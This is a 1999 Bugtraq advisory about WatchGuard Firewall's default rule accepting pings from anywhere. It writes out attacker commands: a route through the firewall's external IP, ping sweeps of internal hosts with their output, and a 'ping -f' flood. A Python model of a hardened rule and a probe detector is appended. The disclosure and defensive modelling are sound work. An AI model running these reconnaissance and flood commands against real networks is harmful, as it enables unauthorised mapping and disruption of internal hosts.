Bugtraq mailing list archives
Default configuration in WatchGuard Firewall
From: altellez () IP6SEGURIDAD COM (Alfonso Lazaro)
Date: Thu, 2 Sep 1999 13:15:36 +0200
I have found a misconfiguration in the default configuration of WatchGuard Firewall.
By default it appends a rule that accepts pings from any to any.
So if our Firebox is defending our internal network ( 192.168.x.x ... )
and our WG Firewall is a proxy with an external IP on the Internet ( 100.100.100.100, a hypothetical IP address ), the attacker
can change his/her routes like so:
# route add -net 192.168.0.0 netmask 255.255.255.0 gw 100.100.100.100
# ping 192.168.1.1
PING 192.168.1.1 (192.168.1.1): 56 data bytes
64 bytes from 192.168.1.1: icmp_seq=0 ttl=251 time=514.0 ms
^C
# ping 192.168.1.2
PING 192.168.1.2 (192.168.1.2): 56 data bytes
64 bytes from 192.168.1.2: icmp_seq=0 ttl=251 time=523.0 ms
^C
and so on ...
The attacker can now discover internal network IPs and attack them:
# ping -f 192.168.1.1
The solution is easy ... do not allow pings to the internal network.
--
Regards.
===========================================================
Alfonso Lazaro Tellez altellez () ip6seguridad com
Security analyst
IP6Seguridad http://www.ip6seguridad.com
Tel: +34 91-3430245 C\Alberto Alcocer 5, 1 D
Fax: +34 91-3430294 Madrid ( SPAIN )
===========================================================
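An added illustration of the point in the post (not WatchGuard's own rule syntax or code): the permissive default rule modelled beside a corrected one that refuses echo requests arriving on the external interface for the internal range, plus a check that flags that traffic pattern. Interface names, the 192.168.0.0/16 internal range and the 203.0.113.7 source address are assumptions.

```python
"""Model of the default discussed in the post (ping any->any) beside a
corrected policy, and a flag for the probe pattern. Constructed example."""
import ipaddress
from dataclasses import dataclass

# Assumed internal range; a real site would list its own trusted networks.
INTERNAL_NETS = [ipaddress.ip_network("192.168.0.0/16")]


@dataclass(frozen=True)
class Packet:
    iface: str   # interface the packet arrived on: "external" or "trusted"
    src: str
    dst: str
    proto: str   # "icmp-echo", "tcp", ...


def is_internal(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def default_policy(pkt: Packet) -> str:
    # The rule the post describes: ICMP echo from any to any is accepted,
    # regardless of which side it came in on or where it is going.
    if pkt.proto == "icmp-echo":
        return "accept"
    return "deny"


def hardened_policy(pkt: Packet) -> str:
    # Corrected: nothing arriving on the external interface may be forwarded
    # to the internal range. Pings to the firewall's own external address and
    # pings originating from the trusted side are still allowed.
    if pkt.iface == "external" and is_internal(pkt.dst):
        return "deny"
    if pkt.proto == "icmp-echo":
        return "accept"
    return "deny"


def flag_probe(pkt: Packet) -> bool:
    """Detection: an echo request from the external side addressed to an
    internal host is the sweep pattern shown in the post."""
    return (pkt.iface == "external" and pkt.proto == "icmp-echo"
            and is_internal(pkt.dst))


# Constructed packets: the probe from the post, a ping to the firewall's
# external address (100.100.100.100 as in the post), and an outbound ping.
PROBE = Packet("external", "203.0.113.7", "192.168.1.1", "icmp-echo")
TO_FIREWALL = Packet("external", "203.0.113.7", "100.100.100.100", "icmp-echo")
OUTBOUND = Packet("trusted", "192.168.1.5", "198.51.100.9", "icmp-echo")
```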